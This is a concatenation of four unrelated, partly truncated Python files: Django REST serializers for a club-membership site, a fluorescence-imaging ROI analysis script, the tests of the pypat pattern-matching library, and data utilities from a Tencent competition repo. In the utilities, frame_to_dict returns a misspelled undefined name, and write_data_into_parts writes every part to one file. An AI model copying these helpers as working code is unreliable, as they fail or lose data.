if not obj.image and not obj.person.profile.image:
return None
return obj.image.url if obj.image else obj.person.profile.image.url
class Meta:
model = Membership
fields = ["name", "role", "description", "image"]
class UserMembershipInviteSerializer(MembershipInviteSerializer):
"""
This serializer is used for listing the email invitations
that the current user was sent.
"""
token = serializers.CharField(max_length=128)
code = serializers.CharField(source="club.code", read_only=True)
class Meta(MembershipInviteSerializer.Meta):
fields = MembershipInviteSerializer.Meta.fields + ["code"]
class MembershipSerializer(ClubRouteMixin, serializers.ModelSerializer):
"""
Used for listing which users are in a club for members who are not in the club.
"""
email = serializers.SerializerMethodField("get_email")
username = serializers.SerializerMethodField("get_username")
name = serializers.SerializerMethodField("get_full_name")
person = serializers.PrimaryKeyRelatedField(
queryset=get_user_model().objects.all(), write_only=True
)
role = serializers.IntegerField(write_only=True, required=False)
image = serializers.SerializerMethodField("get_image")
def get_username(self, obj):
if not obj.public:
return None
return obj.person.username
def get_full_name(self, obj):
if not obj.public:
return "Anonymous"
return obj.person.get_full_name()
def get_email(self, obj):
if not obj.public or not obj.person.profile.show_profile:
return None
return obj.person.email
def get_image(self, obj):
if not obj.public:
return None
if not obj.image and not obj.person.profile.image:
return None
image_url = obj.image.url if obj.image else obj.person.profile.image.url
if image_url.startswith("http"):
return image_url
elif "request" in self.context:
return self.context["request"].build_absolute_uri(image_url)
else:
return image_url
def validate_role(self, value):
"""
Ensure that users cannot promote themselves to a higher role.
Also ensure that owners can't demote themselves without leaving another owner.
"""
user = self.context["request"].user
mem_user_id = (
self.instance.person.id if self.instance else self.initial_data["person"]
)
club_code = self.context["view"].kwargs.get(
"club_code", self.context["view"].kwargs.get("code")
)
membership = Membership.objects.filter(
person=user, club__code=club_code
).first()
if user.has_perm("clubs.manage_club"):
return value
if membership is None:
raise serializers.ValidationError(
"You must be a member of this club to modify roles!"
)
if membership.role > value:
raise serializers.ValidationError(
"You cannot promote someone above your own level."
)
if value > Membership.ROLE_OWNER and user.id == mem_user_id:
if membership.role <= Membership.ROLE_OWNER:
if (
Membership.objects.filter(
club__code=club_code, role__lte=Membership.ROLE_OWNER
).count()
<= 1
):
raise serializers.ValidationError(
"You cannot demote yourself if you are the only owner!"
)
return value
def validate(self, data):
"""
Normal members can only change a small subset of information.
"""
user = self.context["request"].user
club_code = self.context["view"].kwargs.get(
"club_code", self.context["view"].kwargs.get("code")
)
membership = Membership.objects.filter(
person=user, club__code=club_code
).first()
if not user.is_superuser and (
membership is None or membership.role > Membership.ROLE_OFFICER
):
for field in data:
if field not in {"active", "public"}:
raise serializers.ValidationError(
'Normal members are not allowed to change "{}"!'.format(field)
)
return data
class Meta:
model = Membership
fields = [
"active",
"email",
"image",
"name",
"person",
"public",
"role",
"title",
"username",
"description",
]
class AuthenticatedMembershipSerializer(MembershipSerializer):
"""
Provides additional information about members, such as email address.
Should only be available to users in the club.
"""
role = serializers.IntegerField(required=False)
email = serializers.EmailField(source="person.email", read_only=True)
username = serializers.CharField(source="person.username", read_only=True)
def get_full_name(self, obj):
return obj.person.get_full_name()
class Meta(MembershipSerializer.Meta):
pass
class ClubMinimalSerializer(serializers.ModelSerializer):
"""
Return only the club name, code, and approval status for a club.
"""
class Meta:
model = Club
fields = ["name", "code", "approved"]
class ClubConstitutionSerializer(ClubMinimalSerializer):
"""
Return the minimal information, as well as the files that the club has uploaded.
"""
files = serializers.SerializerMethodField("get_constitution")
def get_constitution(self, obj):
user = self.context["request"].user
perm = user.is_authenticated and user.has_perm("clubs.see_pending_clubs")
if hasattr(obj, "user_membership_set"):
has_member = bool(obj.user_membership_set)
else:
has_member = False
if hasattr(obj, "prefetch_asset_set"):
return [
{
"name": asset.name if perm or has_member else None,
"url": asset.file.url if perm or has_member else None,
}
for asset in obj.prefetch_asset_set
if asset.name.endswith((".docx", ".doc", ".pdf"))
or "constitution" in asset.name.lower()
]
return None
class Meta(ClubMinimalSerializer.Meta):
fields = ClubMinimalSerializer.Meta.fields + ["files"]
class ClubListSerializer(serializers.ModelSerializer):
"""
The club list serializer returns a subset of the information that the full
serializer returns.
Optimized for the home page, some fields may be missing if not necessary.
For example, if the subtitle is set, the description is returned as null.
This is done for a quicker response.
"""
tags = TagSerializer(many=True)
image_url = serializers.SerializerMethodField("get_image_url")
favorite_count = serializers.IntegerField(read_only=True)
membership_count = serializers.IntegerField(read_only=True)
is_favorite = serializers.SerializerMethodField("get_is_favorite")
is_subscribe = serializers.SerializerMethodField("get_is_subscribe")
is_member = serializers.SerializerMethodField("get_is_member")
email = serializers.SerializerMethodField("get_email")
subtitle = serializers.SerializerMethodField("get_short_description")
def get_email(self, obj):
if obj.email_public:
return obj.email
return "Hidden"
def get_short_description(self, obj):
if obj.subtitle:
return obj.subtitle
# return first sentence of description without html tags
desc = obj.description.lstrip()[:1000]
cleaned_desc = re.sub(r"<[^>]+>", "", desc)
return (
"".join(re.split(r"(\.|\n|!)", cleaned_desc)[:2])
.replace("&", "&")
.replace("<", "<")
.replace(">", ">")
.replace("–", "-")
.replace("—", "-")
.replace(" ", " ")
.strip()
)
def get_is_favorite(self, obj):
user = self.context["request"].user
if not user.is_authenticated:
return False
if hasattr(obj, "user_favorite_set"):
return bool(obj.user_favorite_set)
return obj.favorite_set.filter(person=user).exists()
def get_is_subscribe(self, obj):
user = self.context["request"].user
if not user.is_authenticated:
return False
if hasattr(obj, "user_subscribe_set"):
return bool(obj.user_subscribe_set)
return obj.subscribe_set.filter(person=user).exists()
def get_is_member(self, obj):
user = self.context["request"].user
if not user.is_authenticated:
return False
if hasattr(obj, "user_membership_set"):
mship = next(iter(obj.user_membership_set), None)
else:
mship = obj.membership_set.filter(person=user).first()
if mship is None:
return False
return mship.role
def get_image_url(self, obj):
# use small version if exists
image = obj.image_small
if not image:
image = obj.image
# correct path rendering
if not image:
return None
if image.url.startswith("http"):
return image.url
elif "request" in self.context:
return self.context["request"].build_absolute_uri(image.url)
else:
return image.url
def get_fields(self):
"""
Override the fields that are returned if the "fields" GET parameter
is specified. Acts as a filter on the returned fields.
"""
all_fields = super().get_fields()
# add in additional report fields
if hasattr(self.__class__, "get_additional_fields"):
for fields in self.__class__.get_additional_fields().values():
for field in fields.values():
all_fields[field] = ReportClubField(field, read_only=True)
fields_param = getattr(self.context.get("request", dict()), "GET", {}).get(
"fields", ""
)
if fields_param:
fields_param = fields_param.split(",")
else:
return all_fields
fields_subset = dict()
for k in fields_param:
if k in all_fields:
fields_subset[k] = all_fields[k]
return fields_subset if len(fields_subset) > 0 else all_fields
def to_representation(self, instance):
"""
Return the previous approved version of a club for users
that should not see unapproved content.
"""
if instance.ghost and not instance.approved:
user = self.context["request"].user
can_see_pending = user.has_perm("clubs.see_pending_clubs") or user.has_perm(
"clubs.manage_club"
)
is_member | |
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import cv2
import os
import pickle
import json
from roipoly.roipoly import RoiPoly, MultiRoi
import argparse
import datetime
import time
from threading import Timer, Thread
from OPTIMAS.utils.files_handling import images_list, read_fps, \
load_timing_data, read_image_size
def input_path():
user_input = input('input neurons png file or ROI mask file:')
user_input_ok = True
return user_input
def time_serie(input_data_folder, experiment, data_type='raw',
timing=True, draw_laser_timings=True, draw_dlp_timings=True,
time_start=0, time_stop=int(-1)):
data_export = [] # placeholder for saving data at the end
### PATHS ###
if data_type == 'raw':
path_input_images = f"{input_data_folder}/{experiment}/images/"
elif data_type == 'denoised':
path_input_images = f"{input_data_folder}/experiment_{experiment}/denoised_images/"
path_output = f"{input_data_folder}/{experiment}/"
# if roi comes from manual countours
roi_file_path = f'{path_output}/roi_masks.txt'
images = images_list(path_input_images)
#############
### ROIS ####
#############
## TODO: use the image from the dlp to do the ROIs ? what if not all rois
## on it ? Use a global Roi file ? How to define it ?
if os.path.isfile(roi_file_path):
print('ROI file exists')
with open(roi_file_path, "rb") as file:
rois = pickle.load(file)
else:
print('ROI file doesnt exists')
w,h = read_image_size(f'{input_data_folder}/{experiment}/{experiment}_info.json')
# TODO: ref image for defining rois, need to think about what it can be. The best would be a DIC image ?
# use an automatic segmentation algorithm if possible with a DIC image ?
neurons_png = f'{input_data_folder}/{experiment}/neurons.png'
if os.path.exists(neurons_png):
print('neurons file for delimiting ROI exists')
image = cv2.imread(f'{input_data_folder}/{experiment}/neurons.png',
cv2.IMREAD_GRAYSCALE)
# from scipy.ndimage import convolve
# image_downsampled = convolve(image,
# np.array([[0.25,0.25],[0.25,0.25]]))[:image.shape[0]:2,:image.shape[1]:2]
# image = image_downsampled
#####################################################
##### TO CHANGE IN UPDATED PIPELINE VERSION #########
# else:
# print('no neuron image file')
# pass
# # print('''need user input for ROI file path: it needs to be an image
# from the image folder where you can see the neurons''')
# user_input = [None]
# global user_input_ok
# user_input_ok = False
# thread = Thread(target=input_path, daemon=False)
# thread.start()
# time.sleep(15)
# if user_input_ok:
# thread.join()
# print(user_input)
# else:
# thread._stop()
# if ROI_path.endswith('.txt'):
# with open(ROI_path, "rb") as file:
# rois = pickle.load(file)
# elif ROI_path.endswith('.png'):
# image = cv2.imread(ROI_path, cv2.IMREAD_GRAYSCALE)
# cv2.imwrite(f'{input_data_folder}/{experiment}/neurons.png', image)
# if image.size == 0:
# print('error with neuron image, cannot define ROIs')
# else:
# image = cv2.resize(image, (w,h))
######################################################################
# Show the image
fig = plt.figure()
plt.imshow(image, interpolation='none', cmap='gray')
plt.title("Click on the button to add a new ROI")
# Draw multiple ROI
multiroi_named = MultiRoi(roi_names=['Background', 'ROI 1', 'ROI 2', 'ROI 3', 'ROI 4', 'ROI 5',
'ROI 6', 'ROI 7', 'ROI 8', 'ROI 9', 'ROI 10', 'ROI 11',
'ROI 12', 'ROI 13', 'ROI 14', 'ROI 15', 'ROI 16', 'ROI 17'])
# Draw all ROIs
plt.imshow(image, interpolation='none', cmap='gray')
rois = []
for name, roi in multiroi_named.rois.items():
roi.display_roi()
# roi.display_mean(image)
mask = roi.get_mask(image)
rois.append([name, mask])
plt.legend()
plt.savefig(f'{path_output}/rois.png')
plt.close()
## writing rois to disk
with open(roi_file_path, "wb") as file:
pickle.dump(rois, file)
rois_signal = []
## not the most optimized, would be better to log every roi in each image than load every image multiple times
for roi in rois:
tmp_time_serie_roi = []
for image in tqdm(images):
img = cv2.imread(f'{path_input_images}/{image}',cv2.IMREAD_GRAYSCALE)
mask = roi[1]
#####################################################
##### TO CHANGE IN UPDATED PIPELINE VERSION #########
# roi_average = np.mean(img[mask.T])
roi_average = np.mean(img[mask])
###################################################################
tmp_time_serie_roi.append(roi_average)
rois_signal.append(tmp_time_serie_roi)
print ('generating data plots')
### TIMING DATA ###
json_timings_file = f'{input_data_folder}/{experiment}/{experiment}_timings.json'
json_info_file = f'{input_data_folder}/{experiment}/{experiment}_info.json'
if timing:
timings_dlp_on, \
timings_dlp_off, \
timings_camera_images, \
timings_laser_on, \
timings_laser_off, \
timings_camera_images_bis = load_timing_data(json_timings_file)
# timings perf_counter equivalent to unix timestamp
# timings_camera_images_bis.append(660)
# TODO: handle multiple dlp on/off within each experiment
if len(timings_dlp_on)>1:
print('more than 1 timing from DLP ON')
timings_dlp_on = [timings_dlp_on[0]]
## for diagnostic plot for the times of the camera dcam api metadata
# plt.plot(np.array(timings_camera_images), range(0,len(timings_camera_images)))
## use the timings metadata of the dcap api ## for now broken, replaced with manual incrementation
#timings_camera_images_new = timings_camera_images[time_init : time_end] ## back to this when solved problem of metadata from the dcam api
timings_camera_images_new = []
timings_camera_images_new.append(timings_camera_images[0])
for nb_of_times in range(1,len(timings_camera_images)):
fps = read_fps(json_info_file) ## to get for each expe
timings_camera_images_new.append(timings_camera_images[0] + (1/fps * nb_of_times))
## diagnostic
# plt.plot(np.array(timings_camera_images_new), range(0,len(timings_camera_images_new)))
timings_camera_images = timings_camera_images_new
print(f'number of camera images: {len(timings_camera_images)}')
print(f'number of points in the each roi signal: {len(rois_signal[0])}')
assert len(images) == len(timings_camera_images), 'not the same number of images and images timing metadata' ## will not work when working on subset of the data
## to put both dlp, laser and camera timings in the same format
## putting dlp and laser time refs back into camera ref
#timings_camera_images = [timings_camera_images[i]*10**9 for i in range(len(timings_camera_images))] ##for dcam api meta
_timings_dlp_on = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_dlp_on[0] - timings_camera_images_bis[1])/1000
_timings_dlp_off = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_dlp_off[0] - timings_camera_images_bis[1])/1000
##########################################################################
#################### TO UPDATE #################### ####################
_timings_laser_on = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_laser_on[0] - timings_camera_images_bis[1])/1000
# _timings_laser_on = 0
_timings_laser_off = timings_camera_images[0] + (timings_camera_images[0] - timings_camera_images_bis[0]) + (timings_laser_off[0] - timings_camera_images_bis[1])/1000
# _timings_laser_off = 0
################################################################################
################################################################################
timings_dlp_on = []
timings_dlp_off = []
timings_laser_on = []
timings_laser_off = []
timings_dlp_on.append(_timings_dlp_on)
timings_dlp_off.append(_timings_dlp_off)
timings_laser_on.append(_timings_laser_on)
timings_laser_off.append(_timings_laser_off)
### if different length between timings and images
# cropped_rois_signal = []
# for roi_signal in rois_signal:
# cropped_rois_signal.append(roi_signal[0:len(timings_camera_images)])
# len(cropped_rois_signal[0])
# rois_signal = cropped_rois_signal
time_sorted_rois_signal = []
x_axis_sorted_values = []
for i in range(len(rois_signal)):
data = np.vstack((timings_camera_images, rois_signal[i]))
data.shape
time_sorted_rois_signal.append(data[1][data[0,:].argsort()])
x_axis_sorted_values = np.array(data[0][data[0,:].argsort()])
x_axis = np.array([(x_axis_sorted_values[frame] - x_axis_sorted_values[0]) for frame in range(len(x_axis_sorted_values))])
## diagnostic plot: time between 2 images
times_between_two_images = []
for frame in range(len(x_axis)-1):
times_between_two_images.append((x_axis[frame+1] - x_axis[frame]))
times_between_two_images.append(times_between_two_images[-1])
nb_images = np.arange(0,len(data[1]), 1)
#plt.plot(nb_images, np.array(times_between_two_images))
rois_signal = time_sorted_rois_signal
## for baseline calculation:
if timing:
# find laser_on index on x_axis
takeClosest = lambda num,collection:min(collection,key=lambda x:abs(x-num))
closest_index_laser_on_on_x = takeClosest(timings_laser_on[0]/10**9, x_axis)
index_laser_on_for_baseline_calc = np.where(x_axis == closest_index_laser_on_on_x)
# find dlp_on index on x_axis
closest_index_dlp_on_on_x = takeClosest(timings_dlp_on[0]/10**9, x_axis)
index_dlp_on_for_baseline_calc = np.where(x_axis == closest_index_dlp_on_on_x)
## baseline starting and ending
## need to be timed on the frames after laser activation I think
baseline_starting_frame = index_laser_on_for_baseline_calc[0][0] + 2
#TODO: need to be adjusted to be up to the frame-1 of dlp activation ?
baseline_frame_number = 10
else :
baseline_starting_frame = 1000
baseline_frame_number = 10
### GRAPHS ###
# calculation of F(t)
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w']
# if timings is False no x_axis has been defined
if timing == False:
x_axis = np.arange(0,len(images), 1)
for i in range(len(rois_signal)):
plt.plot(x_axis, np.array(rois_signal[i]),
color = colors[i], label = rois[i][0], alpha=0.7)
if timing:
for i in range(len(timings_dlp_on)):
if draw_dlp_timings:
plt.axvspan(timings_dlp_on[i] - x_axis_sorted_values[0],
timings_dlp_off[i] - x_axis_sorted_values[0],
color='blue', alpha=0.05)
if draw_laser_timings:
plt.axvspan(timings_laser_on[i] - x_axis_sorted_values[0],
timings_laser_off[i] - x_axis_sorted_values[0],
color='red', alpha=0.05)
plt.legend()
plt.title('Pixel value evolution with frames')
plt.ylabel('Value')
if timing == False:
plt.savefig(f'{path_output}pixel_time_serie_whole_data.svg')
#plt.savefig(path_output+'pixel_time_serie_whole_data.png')
elif timing == True:
plt.savefig(f'{path_output}pixel_time_serie_whole_data_{time_start}_{time_stop}.svg')
#plt.savefig(f'{path_output}pixel_time_serie_whole_data_{args.time[0]}_{args.time[1]}.png')
plt.close()
## calculation of F(t) - background(t)
for i in np.arange(1, len(rois_signal), 1):
plt.plot(x_axis, np.array(rois_signal[0])-np.array(rois_signal[i]), color = colors[i], label = rois[i][0], alpha=0.7)
if timing:
for i in range(len(timings_dlp_on)):
if draw_dlp_timings:
plt.axvspan(timings_dlp_on[i] - x_axis_sorted_values[0],timings_dlp_off[i] - x_axis_sorted_values[0], color='blue', alpha=0.05)
if draw_laser_timings:
plt.axvspan(timings_laser_on[i] - x_axis_sorted_values[0],timings_laser_off[i] - x_axis_sorted_values[0], color='red', alpha=0.05)
plt.title('Fluorescence with substracted backg fluorescence (per frame)')
plt.ylabel('Value')
plt.legend()
if timing == False:
plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_whole_data.svg')
#plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_whole_data.png')
elif timing == True:
plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_{time_start}_{time_stop}.svg')
#plt.savefig(f'{path_output}pixel_time_serie_with_backg_substraction_{args.time[0]}_{args.time[1]}.png')
plt.close()
## calculation of percent delta F/F0
times = []
baseline_background = np.mean(np.array(rois_signal[0][baseline_starting_frame:baseline_starting_frame+baseline_frame_number])) ## temporal average
if baseline_background == 0.0:
baseline_background = 1.0
dF_over_F0_background = ((np.array(rois_signal[0]) - baseline_background) / baseline_background)
percent_dF_over_F0_background = dF_over_F0_background*100
# plt.plot(x_axis, percent_dF_over_F0_background, color= 'b', label = rois[0][0], alpha=0.7)
if timing:
for i in range(len(timings_dlp_on)):
if draw_dlp_timings:
plt.axvspan(timings_dlp_on[i] - x_axis_sorted_values[0],timings_dlp_off[i] - x_axis_sorted_values[0], color='blue', alpha=0.05)
if draw_laser_timings:
plt.axvspan(timings_laser_on[i] - x_axis_sorted_values[0],timings_laser_off[i] - x_axis_sorted_values[0], color='red', alpha=0.05)
for i in np.arange(1, len(rois_signal), 1):
_times = []
baseline_soma = np.mean(np.array(rois_signal[i][baseline_starting_frame:baseline_starting_frame + baseline_frame_number]))
if baseline_soma == 0.0:
baseline_soma = 1.0
dF_over_F0_soma = ((np.array(rois_signal[i]) - baseline_soma) / baseline_soma) - dF_over_F0_background
percent_dF_over_F0_soma = dF_over_F0_soma * 100
# plt.ylim([-5,35])
plt.plot(x_axis, percent_dF_over_F0_soma, color = colors[i], label = rois[i][0], alpha=0.7)
data_export.append(percent_dF_over_F0_soma.tolist())
if timing:
dlp_on_value_on_x = 0
dlp_off_value_on_x = 0
laser_off_value_on_x = 0
laser_on_value_on_x = 0
for i in range(len(timings_dlp_on)):
if draw_dlp_timings:
dlp_on_value_on_x = timings_dlp_on[i] - x_axis_sorted_values[0]
dlp_off_value_on_x = timings_dlp_off[i] - x_axis_sorted_values[0]
plt.axvspan(dlp_on_value_on_x, dlp_off_value_on_x, color='blue', alpha=0.05)
if draw_laser_timings:
laser_on_value_on_x = timings_laser_on[i] - x_axis_sorted_values[0]
laser_off_value_on_x = timings_laser_off[i] - x_axis_sorted_values[0]
plt.axvspan(laser_on_value_on_x, laser_off_value_on_x, color='red', alpha=0.05)
_times = dlp_on_value_on_x, dlp_off_value_on_x , laser_on_value_on_x, laser_off_value_on_x
times.append(_times)
plt.ylabel(r'$\%$ | |
<reponame>mvitousek/pypat
import unittest
from pypat import *
class TestExamples(unittest.TestCase):
# Matching against literal values
def test_literal(self):
result = match(42,
(234, lambda: False),
(True, lambda: False),
(42, lambda: True))
self.assertTrue(result)
# If no case matches, a PatternException is thrown
def test_fail(self):
thunk = lambda: match(999,
(234, lambda: False),
(True, lambda: False),
(42, lambda: True))
self.assertRaises(PatternException, thunk)
# Special case: if you want to match against string literals in
# patterns, you must wrap it in a Literal object (to disambiguate
# from variable bindings, as shown later)
def test_explicitliteral1(self):
result = match('hello world',
(Literal('hello world'), lambda: True),
(42, lambda: False))
self.assertTrue(result)
def test_explicitliteral2(self):
result = match(42,
(Literal('hello world'), lambda: True),
(42, lambda: False))
self.assertFalse(result)
# Strings that are not wrapped in Literal are variables. The
# pattern's action function expects parameters with the same names
# as the variables in the pattern. Variables match anything.
def test_variables(self):
class Arbitrary(object):
def __eq__(self, other):
return self.__class__ == other.__class__
result = match(Arbitrary(),
(42, lambda: False),
('x', lambda x: x))
self.assertEqual(result, Arbitrary())
# If you want to match against any value without binding it to a
# variable, use the '_' symbol (in a string).
def test_any(self):
result = match(4545,
(42, lambda: False),
(10101, lambda: False),
('_', lambda: True))
self.assertTrue(result)
# You can also add guards to cases. The guard is an instance of
# type Guard, which takes a function, which itself takes variables
# introduced in its pattern. The guard can go in between the
# pattern and the action function of the case.
def test_guards(self):
result = match('hello world',
('x', Guard(lambda x: isinstance(x, int)), lambda x: x * x),
('x', Guard(lambda x: isinstance(x, str)), lambda x: x))
self.assertEqual(result, 'hello world')
# You can match against tuples by putting tuples in your
# patterns. Tuples can contain any pattern, and variables will be
# bound appropriately.
def test_tuple(self):
def arith(*op):
return match(op,
((Literal('+'), 'x', 'y'), lambda x, y: x + y),
((Literal('*'), 'x', 'y'), lambda x, y: x * y),
((Literal('pred'), 'x'), lambda x: x - 1))
self.assertEqual(arith('*', 4, 5), 20)
self.assertEqual(arith('+', 39, 3), 42)
self.assertEqual(arith('pred', 4), 3)
# If the same variable appears more than once in a pattern, it has
# to be bound to the same value each time for the pattern to match
def test_multi(self):
def eq(v1, v2):
return match((v1, v2),
(('x', 'x'), lambda x: True),
(('x', 'y'), lambda x,y: False))
self.assertTrue(eq(3,3))
self.assertFalse(eq(2,5))
# If the same action (and variable bindings) will be used for
# multiple cases, you can add additional patterns to a case with
# the Or class, which takes a pattern.
def test_ors(self):
def timesWillEqZero(n1, n2):
return match((n1, n2),
((0, 'x'), Or(('x', 0)), lambda x: True),
('_', lambda: False))
self.assertTrue(timesWillEqZero(0, 43))
self.assertTrue(timesWillEqZero(42, 0))
self.assertFalse(timesWillEqZero(42, 2))
# Lists can be matched against using the PairList and EmptyList
# classes. PairLists are nonempty lists that have a head and a
# tail, and EmptyLists are empty lists.
def test_list(self):
def mmap(op, lst):
return match(lst,
(PairList('x', 'xs'), lambda x, xs: [op(x)] + mmap(op, xs)),
(EmptyList(), lambda: []))
self.assertEqual(mmap((lambda x: x * x), [1,2,3,4]), [1,4,9,16])
# You can match based on the runtime type of a matched value by
# putting types in the patterns.
def test_types(self):
result = match('hello world',
(int, lambda: False),
(str, lambda: True))
self.assertTrue(result)
# If you want to bind the target (or a portion of it) to a
# variable, but you also want to pattern match on something deeper
# in the target, you can use the As class to do both:
def test_as(self):
def expr(*op):
return match(op,
((Literal('+'), As('x', int), As('y', int)), lambda x, y: x + y),
((Literal('or'), As('x', bool), As('y', bool)), lambda x, y: x or y))
self.assertEqual(expr('or', True, False), True)
self.assertEqual(expr('+', 39, 3), 42)
self.assertRaises(PatternException, lambda: expr('or', 1, 2))
def test_deepas(self):
result = match([1,2,3],
(PairList('_', As('r', PairList(As('x', int),'_'))),
lambda x,r: '%s is in %s' % (x,r)))
self.assertEqual(result, '2 is in [2, 3]')
# Objects that do not perform any kind of input checking can be
# subclassed from PureMatchable and then used as patterns.
def test_purematch1(self):
class C(PureMatchable):
def __init__(self, a, b, c):
pass
self.assertEqual(match(C(1,2,'3'),
(C(3,'b','c'), lambda b,c: b),
(C('a','b',Literal('3')), lambda a,b: a),
(C('a','b','c'), lambda a,b,c: c),
('_', lambda: None)),
1)
def test_purematch2(self):
class Expr(PureMatchable):
pass
class Add(Expr):
def __init__(self, rand1, rand2):
pass
class Mult(Expr):
def __init__(self, rand1, rand2):
pass
class Num(Expr):
def __init__(self, n):
pass
def step(expr):
return match(expr,
(Add(Num('n1'), Num('n2')),
lambda n1, n2: Num(n1 + n2)),
(Add(Num('n1'), 'n2'),
lambda n1, n2: Add(Num(n1), step(n2))),
(Add('n1', 'n2'),
lambda n1, n2: Add(step(n1), n2)),
(Mult(Num('n1'), Num('n2')),
lambda n1, n2: Num(n1 * n2)),
(Mult(Num('n1'), 'n2'),
lambda n1, n2: Mult(Num(n1), step(n2))),
(Mult('n1', 'n2'),
lambda n1, n2: Mult(step(n1), n2)))
def eval(expr):
return match(expr,
(Num('n'), lambda n: n),
('e', lambda e: eval(step(e))))
self.assertEqual(eval(Add(Mult(Num(4), Num(2)), Add(Num(1), Add(Num(0), Num(1))))),
10)
# Objects that can't be PureMatchable (because, for example, they
# sanitize inputs, or it makes sense to decompose them into
# something other than their constructor's arguments) can subclass
# from Matchable, and implement pattern() (which is a class
# method) and decompose(). decompose() returns the decomposition
# of the object, which can be anything the user desires as long as
# it is a valid match target. pattern() should take patterns and
# return them in such a way that they can match decompose()
# (including caveats like strings needing to be in
# Literal). [CLASS].pattern() should then be used in lieu of the
# classname alone.
def test_matchable(self):
class Summer(Matchable):
def __init__(self, *nums):
self.sum = sum(nums)
def decompose(self):
return ('SUM', self.sum)
@classmethod
def pattern(cls, pat):
return (Literal('SUM'), pat)
result = match(Summer(1,2,3,4,5),
(Summer.pattern(54), lambda: False),
(Summer.pattern(As('x', int)), lambda x: x))
self.assertEqual(result, 15)
# Functions can be defined as part of a match pattern with the
# @matchable decorator, and the @[FUN].case decorator (where fun
# is the name of the actual partially specified function)
def test_sepdef1(self):
@matchable(1)
def factorial():
return 1
@factorial.case(0)
def factorial():
return 0
@factorial.case(As('n',int), Guard(lambda n: n > 1))
def factorial(n):
return factorial(n-1) * n
self.assertEqual(factorial(5), 120)
self.assertRaises(PatternException, lambda: factorial(-5))
def test_sepdef2(self):
@matchable(As('x',Literal('Dog.')))
def foo(x):
return x
@foo.case(42, Or((-42,)))
def foo():
return 'it\'s 42!!'
@foo.case('a', int)
def foo(a):
return 'cdrnum'
@foo.case()
def foo():
return 'EMPTY'
self.assertEqual(foo(42), 'it\'s 42!!')
self.assertEqual(foo(3,2), 'cdrnum')
self.assertEqual(foo('Dog.'), 'Dog.')
self.assertEqual(foo(), 'EMPTY')
self.assertRaises(PatternException, lambda: foo(3,'a'))
self.assertRaises(PatternException, lambda: foo(22))
# Match object can be built and cases added to them.
def test_matchobj(self):
matcher = Match([(42, lambda: 'yes')])
matcher.add('x', Guard(lambda x: isinstance(x, int)), lambda x: x)
matcher.add(('x', 'y'), lambda x,y: x + y)
self.assertEqual(matcher(42), 'yes')
self.assertEqual(matcher(120), 120)
self.assertEqual(matcher((1,2)), 3)
self.assertRaises(PatternException, lambda: matcher('bluh'))
matcher.add('_', lambda: 'miss')
self.assertEqual(matcher('bluh'), 'miss')
def test_lambda(self):
class LC(PureMatchable):
pass
class Abs(LC):
def __init__(self, x, e): pass
class App(LC):
def __init__(self, e1, e2): pass
class Var(LC):
def __init__(self, x): pass
# Lambda calculus
def pp(e):
return match(e,
(Var('x'), lambda x: x),
(Abs('x', 'e'),
lambda x,e: '(lambda %s: %s)' % (x, pp(e))),
(App('e1', 'e2'),
lambda e1,e2: '%s(%s)' % (pp(e1), pp(e2))))
def is_val(e):
return match(e,
(Abs, lambda: True),
('_', lambda: False))
def step(e):
return match(e,
(App(Abs('x', 'e1'), 'e2'),
Guard(lambda x,e1,e2: is_val(e2)),
lambda x,e1,e2: subst(e1, x, e2)),
(App(As('e1', Abs), 'e2'),
lambda e1,e2: App(e1, step(e2))),
(App('e1', 'e2'),
lambda e1,e2: App(step(e1), e2)),
name='step')
def subst(e, x, v):
return match((e, x),
((App('e1', 'e2'), '_'),
lambda e1,e2: App(subst(e1,x,v), subst(e2,x,v))),
((As('e1',Abs('x', 'eb')), 'x'),
lambda e1,x,eb: e1),
((Abs('y','e'), '_'),
lambda y,e: Abs(y,subst(e,x,v))),
((Var('x'), 'x'),
lambda x: v),
((Var('y'), '_'),
lambda y: Var(y)))
def leval(e):
return match(e,
('_', Guard(lambda: is_val(e)), lambda: e),
('_', lambda: leval(step(e))))
plus = Abs('m', Abs('n', Abs('f', Abs('x',
App(
App(Var('m'), Var('f')),
App(
App(Var('n'), Var('f')),
Var('x')))))))
zero = Abs('f', Abs('x', Var('x')))
one = Abs('f', Abs('x', App(Var('f'), Var('x'))))
two = Abs('f', Abs('x', App(Var('f'),
App(Var('f'),
Var('x')))))
three = Abs('f', Abs('x', App(Var('f'),
App(Var('f'),
App(Var('f'),
Var('x'))))))
threeq = leval(App(App(plus, one), two))
psucc | |
<reponame>tangaqi/tencent2019-rank88<filename>tencent-chusai/src/utils.py
import os
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.metrics import roc_auc_score
from time import time
import random
import pandas as pd
def frame_to_dict(train):
train_dict = {}
for col in train.columns:
train_dict[col] = train[col].columns
return trian_dict
def write_data_into_parts(data, root_path, nums = 5100000):
l = data.shape[0] // nums
for i in range(l+1):
begin = i * nums
end = min(nums*(i+1), data.shape[0])
t_data = data[begin:end]
t_data.tofile(root_path + '.bin')
def write_dict(path, data):
fw = open(path, 'w')
for key in data:
fw.write(str(key) + ',' + str(data[key]) + '\n')
fw.close()
def read_allfea(path):
f = open(path,'r')
fea = '0'
for i in f:
fea = i
fea_val = fea.split(',')
index_dict = {}
for i,fea in enumerate(fea_val):
index_dict[fea] = i + 1
if '-1' not in index_dict:
index_dict['-1'] = len(fea_val)
return fea, index_dict
def one_hot_feature_process(train_data, val_data, test2_data, begin_num, filter_num = 0):
index_dict = {}
begin_index = begin_num
train_res = []
for d in train_data:
# print(d)
# 给出现的value赋予一个index指引
if d not in index_dict:
index_dict[d] = begin_index
begin_index += 1
# print(index_dict[d])
train_res.append(index_dict[d])
if '-1' not in index_dict:
index_dict['-1'] = begin_index
val_res = []
for d in val_data:
if d not in index_dict:
index_dict[d] = begin_index
begin_index += 1
val_res.append(index_dict[d])
test2_res = []
for d in test2_data:
if d not in index_dict:
d = '-1'
test2_res.append(index_dict[d])
# print(np.array(train_res))
return np.array(train_res), np.array(val_res), np.array(test2_res),index_dict
